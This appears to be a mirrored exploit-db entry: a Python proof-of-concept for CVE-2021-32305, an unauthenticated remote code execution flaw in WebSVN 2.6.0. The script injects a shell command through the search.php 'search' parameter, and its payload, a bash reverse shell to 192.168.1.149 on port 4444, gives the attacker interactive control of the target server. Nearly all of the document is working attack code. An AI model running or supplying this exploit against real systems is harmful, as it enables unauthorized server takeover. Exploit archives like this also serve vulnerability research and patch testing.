Websvn 2.6.0 – Remote Code Execution (Unauthenticated)

  • 作者: g0ldm45k
    日期: 2021-06-21
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50042/
  • # Exploit Title: Websvn 2.6.0 - Remote Code Execution (Unauthenticated)
    # Date: 20/06/2021
    # Exploit Author: g0ldm45k
    # Vendor Homepage: https://websvnphp.github.io/
    # Software Link: https://github.com/websvnphp/websvn/releases/tag/2.6.0
    # Version: 2.6.0
    # Tested on: Docker + Debian GNU/Linux (Buster)
    # CVE : CVE-2021-32305
    
    import requests
    import argparse
    from urllib.parse import quote_plus
    
    PAYLOAD = "/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.149/4444 0>&1'"
    REQUEST_PAYLOAD = '/search.php?search=";{};"'
    
    parser = argparse.ArgumentParser(description='Send a payload to a websvn 2.6.0 server.')
    parser.add_argument('target', type=str, help="Target URL.")
    
    args = parser.parse_args()
    
    if args.target.startswith("http://") or args.target.startswith("https://"):
    target = args.target
    else:
    print("[!] Target should start with either http:// or https://")
    exit()
    
    requests.get(target + REQUEST_PAYLOAD.format(quote_plus(PAYLOAD)))
    
    print("[*] Request send. Did you get what you wanted?")